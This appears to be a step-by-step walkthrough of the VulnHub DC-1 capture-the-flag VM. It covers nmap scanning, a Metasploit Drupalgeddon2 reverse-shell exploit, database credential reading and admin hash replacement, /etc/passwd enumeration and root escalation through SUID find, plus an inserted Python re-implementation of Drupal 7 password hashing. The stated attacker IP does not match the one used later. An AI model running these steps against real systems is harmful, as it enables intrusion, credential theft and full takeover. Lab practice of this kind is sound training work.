Startup
- Target VM download: https://www.vulnhub.com/entry/dc-1,292/#download
- Startup procedure: after downloading, open VMware, choose File > Open, import the downloaded .ova file, and set the network adapter to NAT mode
- Boot screen after a successful start
Scanning
- The subnet being tested is 192.168.29.0/24; the attacking machine's IP is 10.196.93.128
- Scan with nmap

```
# -sP is a ping scan
nmap -sP 192.168.29.0/24
```

- The target's IP is found to be 192.168.29.131
- Run a vulnerability scan against the target

```
# -p selects the ports; -A enables OS detection and version detection at the same time;
# -v raises the verbosity of the output; -T4 sets the scan speed
nmap -p 1-65535 -A -v -T4 192.168.29.131

# Scan results:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 16:17 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:17
Completed NSE at 16:17, 0.00s elapsed
Initiating NSE at 16:17
Completed NSE at 16:17, 0.00s elapsed
Initiating NSE at 16:17
Completed NSE at 16:17, 0.00s elapsed
Initiating Ping Scan at 16:17
Scanning 192.168.29.131 [2 ports]
Completed Ping Scan at 16:17, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:17
Completed Parallel DNS resolution of 1 host. at 16:17, 0.01s elapsed
Initiating Connect Scan at 16:17
Scanning 192.168.29.131 [65535 ports]
Discovered open port 80/tcp on 192.168.29.131
Discovered open port 22/tcp on 192.168.29.131
Discovered open port 111/tcp on 192.168.29.131
Discovered open port 56415/tcp on 192.168.29.131
Completed Connect Scan at 16:17, 4.20s elapsed (65535 total ports)
Initiating Service scan at 16:17
Scanning 4 services on 192.168.29.131
Completed Service scan at 16:18, 11.36s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.29.131.
Initiating NSE at 16:18
Completed NSE at 16:18, 4.12s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.26s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.01s elapsed
Nmap scan report for 192.168.29.131
Host is up (0.00074s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: Drupal 7 (http://drupal.org)
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-title: Welcome to Drupal Site | Drupal Site
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          44051/udp   status
|   100024  1          47967/tcp6  status
|   100024  1          48142/udp6  status
|_  100024  1          56415/tcp   status
56415/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.47 seconds
```

- Analysis of the results
  - Open ports: 80, 22, 111, 56415
  - Port 80 hosts a Drupal web service
Attack
- Use MSF (Metasploit Framework) to look for a Drupal vulnerability

```
msfconsole                    # launch the tool
search drupal                 # search for Drupal modules

# Search results:
Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution

use 1                         # use module 1, the 2018 Drupalgeddon 2 exploit
set RHOST 192.168.29.131      # target IP
set LHOST 192.168.29.128      # attacking machine IP
run                           # start the attack

# Output on success:
[*] Started reverse TCP handler on 192.168.29.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.29.131
[*] Meterpreter session 1 opened (192.168.29.128:4444 -> 192.168.29.131:38928) at 2024-06-02 16:35:12 +0800
```

- Into the target

```
help                                   # list the available commands
shell                                  # drop into a shell on the target
# spawn a proper TTY with python
python -c "import pty;pty.spawn('/bin/bash');"
whoami                                 # current user is www-data
cd /home                               # /home contains a flag4 directory holding flag4.txt
cat /home/flag4/flag4.txt              # permission denied
# Can you use this same method to find or access the flag in root?
# Probably. But perhaps it's not that easy. Or maybe it is?

# Analysis: the only service on the target is the web server, so look around its document root.
# Drupal runs on Apache, whose default document root is /var/www
cd /var/www
ls -l

www-data@DC-1:/var/www$ ls -l
total 168
-rw-r--r--  1 www-data www-data  1481 Nov 21  2013 COPYRIGHT.txt
-rw-r--r--  1 www-data www-data  1451 Nov 21  2013 INSTALL.mysql.txt
-rw-r--r--  1 www-data www-data  1874 Nov 21  2013 INSTALL.pgsql.txt
-rw-r--r--  1 www-data www-data  1298 Nov 21  2013 INSTALL.sqlite.txt
-rw-r--r--  1 www-data www-data 17861 Nov 21  2013 INSTALL.txt
-rwxr-xr-x  1 www-data www-data 18092 Nov  1  2013 LICENSE.txt
-rw-r--r--  1 www-data www-data  8191 Nov 21  2013 MAINTAINERS.txt
-rw-r--r--  1 www-data www-data  5376 Nov 21  2013 README.txt
-rw-r--r--  1 www-data www-data  9642 Nov 21  2013 UPGRADE.txt
-rw-r--r--  1 www-data www-data  6604 Nov 21  2013 authorize.php
-rw-r--r--  1 www-data www-data   720 Nov 21  2013 cron.php
-rw-r--r--  1 www-data www-data    52 Feb 19  2019 flag1.txt
drwxr-xr-x  4 www-data www-data  4096 Nov 21  2013 includes
-rw-r--r--  1 www-data www-data   529 Nov 21  2013 index.php
-rw-r--r--  1 www-data www-data   703 Nov 21  2013 install.php
drwxr-xr-x  4 www-data www-data  4096 Nov 21  2013 misc
drwxr-xr-x 42 www-data www-data  4096 Nov 21  2013 modules
drwxr-xr-x  5 www-data www-data  4096 Nov 21  2013 profiles
-rw-r--r--  1 www-data www-data  1561 Nov 21  2013 robots.txt
drwxr-xr-x  2 www-data www-data  4096 Nov 21  2013 scripts
drwxr-xr-x  4 www-data www-data  4096 Nov 21  2013 sites
drwxr-xr-x  7 www-data www-data  4096 Nov 21  2013 themes
-rw-r--r--  1 www-data www-data 19941 Nov 21  2013 update.php
-rw-r--r--  1 www-data www-data  2178 Nov 21  2013 web.config
-rw-r--r--  1 www-data www-data   417 Nov 21  2013 xmlrpc.php
www-data@DC-1:/var/www$

# flag1.txt found
cat flag1.txt
# Every good CMS needs a config file - and so do you.   (roughly: go look at the config file)

# Config file location: /var/www/sites/default
cd sites/default
cat settings.php
# Reading it reveals flag2 and the database credentials; the hint points at brute force or privilege escalation.

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
```
- Into the database

```
mysql -u dbuser -p drupaldb
show databases;        # list every database on the MySQL server
# +--------------------+
# | Database           |
# +--------------------+
# | information_schema |
# | drupaldb           |
# +--------------------+
# 2 rows in set (0.00 sec)

use drupaldb;
show tables;           # list every table in drupaldb
# +-----------------------------+
# | Tables_in_drupaldb          |
# +-----------------------------+
# | actions                     |
# | authmap                     |
# | batch                       |
# | block                       |
# | block_custom                |
# | block_node_type             |
# | block_role                  |
# | blocked_ips                 |
# | cache                       |
# | cache_block                 |
# | cache_bootstrap             |
# | cache_field                 |
# | cache_filter                |
# | cache_form                  |
# | cache_image                 |
# | cache_menu                  |
# | cache_page                  |
# | cache_path                  |
# | cache_update                |
# | cache_views                 |
# | cache_views_data            |
# | comment                     |
# | ctools_css_cache            |
# | ctools_object_cache         |
# | date_format_locale          |
# | date_format_type            |
# | date_formats                |
# | field_config                |
# | field_config_instance       |
# | field_data_body             |
# | field_data_comment_body     |
# | field_data_field_image      |
# | field_data_field_tags       |
# | field_revision_body         |
# | field_revision_comment_body |
# | field_revision_field_image  |
# | field_revision_field_tags   |
# | file_managed                |
# | file_usage                  |
# | filter                      |
# | filter_format               |
# | flood                       |
# | history                     |
# | image_effects               |
# | image_styles                |
# | menu_custom                 |
# | menu_links                  |
# | menu_router                 |
# | node                        |
# | node_access                 |
# | node_comment_statistics     |
# | node_revision               |
# | node_type                   |
# | queue                       |
# | rdf_mapping                 |
# | registry                    |
# | registry_file               |
# | role                        |
# | role_permission             |
# | search_dataset              |
# | search_index                |
# | search_node_links           |
# | search_total                |
# | semaphore                   |
# | sequences                   |
# | sessions                    |
# | shortcut_set                |
# | shortcut_set_users          |
# | system                      |
# | taxonomy_index              |
# | taxonomy_term_data          |
# | taxonomy_term_hierarchy     |
# | taxonomy_vocabulary         |
# | url_alias                   |
# | users                       |
# | users_roles                 |
# | variable                    |
# | views_display               |
# | views_view                  |
# | watchdog                    |
# +-----------------------------+
# 80 rows in set (0.00 sec)

select name, pass from users;
# +-------+---------------------------------------------------------+
# | name  | pass                                                    |
# +-------+---------------------------------------------------------+
# |       |                                                         |
# | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
# | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
# +-------+---------------------------------------------------------+
# 3 rows in set (0.00 sec)
```

Reference: https://blog.csdn.net/weixin_33345090/article/details/113563493

Research shows that Drupal 5 and 6 hash passwords with MD5, whereas Drupal 7 uses a newer hashing scheme, so the passwords in the target's database are clearly not MD5 hashes. The scripts directory of a Drupal 7 installation contains several PHP scripts provided by the Drupal developers; password-hash.sh is the one that hashes passwords. Note: do not run the script from inside the scripts directory, or it will error (the script takes the current working directory as the Drupal root).

```
php ./scripts/password-hash.sh '123456' > a.txt
cat a.txt
# password: 123456          hash: $S$DOUZtHmiwRkJCsB1s3uvwHURm6GhWXWHMc2hcLXe1h.TzuvNIy2r

# replace the admin password hash with the newly generated one (run in the mysql client)
update users set pass = "$S$DOUZtHmiwRkJCsB1s3uvwHURm6GhWXWHMc2hcLXe1h.TzuvNIy2r" where name = 'admin';
```
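Added example (my own Python, not code from the page or from Drupal): a re-implementation of the Drupal 7 `$S$` scheme the paragraph above refers to, so that a defender auditing a users table can read the scheme and round count off a stored hash's prefix and verify a password against it offline. It assumes the hash that password-hash.sh produced for '123456' above as its test vector; the constant names follow Drupal 7's password.inc.

```python
import hashlib
import os

# Constants from Drupal 7's password.inc, re-implemented here (not Drupal's own code).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55         # DRUPAL_HASH_LENGTH: stored hashes are cut to 55 chars
DEFAULT_COUNT_LOG2 = 15  # DRUPAL_HASH_COUNT: 2**15 rounds, encoded as the 'D' after $S$
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30   # DRUPAL_MIN/MAX_HASH_COUNT


def _b64(data):
    """phpass-style base64 (not RFC 4648): little-endian 3-byte groups, 6 bits per char."""
    out = ""
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        value = int.from_bytes(chunk, "little")
        for j in range(len(chunk) + 1):          # 4 chars per 3 bytes, 2 or 3 for a tail
            out += ITOA64[(value >> (6 * j)) & 0x3F]
    return out


def parse_setting(stored):
    """Split the 12-char setting prefix of a $S$ hash into (count_log2, salt)."""
    if len(stored) < 12 or stored[:3] != "$S$":
        raise ValueError("not a Drupal 7 $S$ hash (a bare 32-hex value is legacy MD5)")
    count_log2 = ITOA64.index(stored[3])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        raise ValueError("round count outside the range Drupal accepts")
    return count_log2, stored[4:12]


def drupal7_crypt(password, setting):
    """SHA-512(salt + pw), then 2**count_log2 rounds of SHA-512(prev + pw), encoded."""
    count_log2, salt = parse_setting(setting)
    pw = password.encode()
    h = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.sha512(h + pw).digest()
    return (setting[:12] + _b64(h))[:HASH_LENGTH]


def check_password(password, stored):
    """True when the password reproduces the stored hash (Drupal's user_check_password)."""
    return drupal7_crypt(password, stored) == stored


def hash_password(password, count_log2=DEFAULT_COUNT_LOG2):
    """Hash with a fresh 8-char salt from 6 random bytes (Drupal's user_hash_password)."""
    return drupal7_crypt(password, "$S$" + ITOA64[count_log2] + _b64(os.urandom(6)))
```

The `$S$D` prefix shared by every hash on this page therefore means 2**15 rounds of SHA-512, which is why a dictionary attack on them is slow compared with a plain MD5 table.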
- flag3

After clicking flag3, the following page is shown:

Keywords: perms, find, passwd, -exec

```
cat /etc/passwd      # list the user accounts
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
# bin:x:2:2:bin:/bin:/bin/sh
# sys:x:3:3:sys:/dev:/bin/sh
# sync:x:4:65534:sync:/bin:/bin/sync
# games:x:5:60:games:/usr/games:/bin/sh
# man:x:6:12:man:/var/cache/man:/bin/sh
# lp:x:7:7:lp:/var/spool/lpd:/bin/sh
# mail:x:8:8:mail:/var/mail:/bin/sh
# news:x:9:9:news:/var/spool/news:/bin/sh
# uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
# proxy:x:13:13:proxy:/bin:/bin/sh
# www-data:x:33:33:www-data:/var/www:/bin/sh
# backup:x:34:34:backup:/var/backups:/bin/sh
# list:x:38:38:Mailing List Manager:/var/list:/bin/sh
# irc:x:39:39:ircd:/var/run/ircd:/bin/sh
# gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
# nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
# libuuid:x:100:101::/var/lib/libuuid:/bin/sh
# Debian-exim:x:101:104::/var/spool/exim4:/bin/false
# statd:x:102:65534::/var/lib/nfs:/bin/false
# messagebus:x:103:107::/var/run/dbus:/bin/false
# sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
# mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
# flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
```

The flag4 account matches what was found at the start: its home is under /home, and reading flag4.txt requires escalating to root.
- Privilege escalation

Reference: https://blog.csdn.net/weixin_44912169/article/details/105845909
Reference: https://blog.csdn.net/aobian2884/article/details/101404466?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522171733441116800186510085%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=171733441116800186510085&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-101404466-null-null.nonecase&utm_term=21&spm=1018.2226.3001.4450
Reference: https://zhuanlan.zhihu.com/p/571759462?utm_id=0

```
# The argument after -exec is the command to run; it is terminated by ';', so the trailing
# semicolon is required. Because ';' has its own meaning in the various shells, it is escaped with a backslash.

# look for executables with the SUID bit set
find / -perm -4000
# www-data@DC-1:/$ find / -perm -4000
# /bin/mount
# /bin/ping
# /bin/su
# /bin/ping6
# /bin/umount
# /usr/bin/at
# /usr/bin/chsh
# /usr/bin/passwd
# /usr/bin/newgrp
# /usr/bin/chfn
# /usr/bin/gpasswd
# /usr/bin/procmail
# /usr/bin/find
# /usr/sbin/exim4
# /usr/lib/pt_chown
# /usr/lib/openssh/ssh-keysign
# /usr/lib/eject/dmcrypt-get-device
# /usr/lib/dbus-1.0/dbus-daemon-launch-helper
# /sbin/mount.nfs
# find: `/proc/3396/task/3396/ns/net': No such file or directory
# find: `/proc/3396/task/3396/ns/uts': No such file or directory
# find: `/proc/3396/task/3396/ns/ipc': No such file or directory
# find: `/proc/3396/ns/net': No such file or directory
# find: `/proc/3396/ns/uts': No such file or directory
# find: `/proc/3396/ns/ipc': No such file or directory
# find: `/proc/3424/task/3424/ns/net': No such file or directory
# find: `/proc/3424/task/3424/ns/uts': No such file or directory
# find: `/proc/3424/task/3424/ns/ipc': No such file or directory
# find: `/proc/3424/ns/net': No such file or directory
# find: `/proc/3424/ns/uts': No such file or directory
# find: `/proc/3424/ns/ipc': No such file or directory
# find: `/proc/3641/task/3641/ns/net': No such file or directory
# find: `/proc/3641/task/3641/ns/uts': No such file or directory
# find: `/proc/3641/task/3641/ns/ipc': No such file or directory
# find: `/proc/3641/ns/net': No such file or directory
# find: `/proc/3641/ns/uts': No such file or directory
# find: `/proc/3641/ns/ipc': No such file or directory
# find: `/proc/4233/task/4233/fd/6': No such file or directory
# find: `/proc/4233/task/4233/fdinfo/6': No such file or directory
# find: `/proc/4233/fd/6': No such file or directory
# find: `/proc/4233/fdinfo/6': No such file or directory
```

find itself is SUID, so its -exec option can be used to escalate:

```
# /bin/sh is equivalent to /bin/bash --posix (POSIX mode: stops running when it hits an error)
www-data@DC-1:/home/flag4$ find flag4.txt -exec '/bin/sh' \;
# whoami
root
```
- flag5

```
# look for the flag file
find / -name '*flag.txt'
# result:
# /root/thefinalflag.txt
cat /root/thefinalflag.txt
# result:
# Well done!!!!
# Hopefully you've enjoyed this and learned some new skills.
# You can let me know what you thought of this little journey
# by contacting me via Twitter - @DCAU7
```

The end.